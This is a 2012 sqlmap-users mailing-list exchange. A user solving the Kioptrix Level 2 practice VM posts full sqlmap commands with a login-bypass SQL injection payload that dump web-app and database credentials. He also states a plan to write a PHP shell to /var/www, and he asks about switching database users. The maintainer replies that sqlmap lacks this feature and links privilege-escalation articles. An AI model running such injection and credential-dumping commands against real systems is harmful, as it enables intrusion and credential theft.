Re: [sqlmap-users] escalating privileges

Fri, 13 Jan 2012 04:40:23 -0800 

Hi Phaedrus.

Sorry, for the time being there is no such mechanism inside sqlmap. Also,
once implemented it will be most certainly limited to only MSSQL and Oracle
(
http://www.abysssec.com/blog/2008/10/16/ms-sql-injection-privilege-scalation/&;
http://www.notsosecure.com/folder2/2009/04/26/oracle-privilege-escalations-from-web-app/
).

Kind regards,
Miroslav Stampar

On Fri, Jan 13, 2012 at 5:02 AM, Phaedrus Black <phaedrus.bl...@gmail.com>wrote:

> hello:
>
> I discovered a vulnerability that allows me to bypass the login screen.
> btw this is the Kioptrix Level 2 puzzle and not a live client/target.
>
> I've managed to dump credentials for the administrator's web interface in
> addition to the database users themselves. There were a few recon commands
> but the meatiest items are below.
>
> Specific commands included:
>
> >sudo python sqlmap.py -u "http://1 <http://172.16.207.129>92.168.1.1"
> --data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3
> --string="Ping" -D webapp -T users --dump --proxy=http://127.0.0.1:8080 <---
> gets me user credentials for the webapp
>
> >sudo python sqlmap.py -u "http://1 <http://172.16.207.129>92.168.1.1"
> --data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3
> --string="Ping" --passwords --proxy=http://127.0.0.1:8080 <--- gets me
> user credentials for the DB.
>
> However, I've discovered that the db user that I am running as does
> **not** have the appropriate privileges to write
> files to the system.
>
> My objective is to write something like phpshell to the /var/www directory
> and go from there.
>
> Is there a way for sqlmap to switch from unprivileged user A to privileged
> user B if I have both sets of credentials?  If so, I can then use the
> "file-write" and "file-dest" options.
>
> thanks,
>
> -pb
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> RSA(R) Conference 2012
> Mar 27 - Feb 2
> Save $400 by Jan. 27
> Register now!
> http://p.sf.net/sfu/rsa-sfdev2dev2
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

------------------------------------------------------------------------------
RSA(R) Conference 2012
Mar 27 - Feb 2
Save $400 by Jan. 27
Register now!
http://p.sf.net/sfu/rsa-sfdev2dev2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to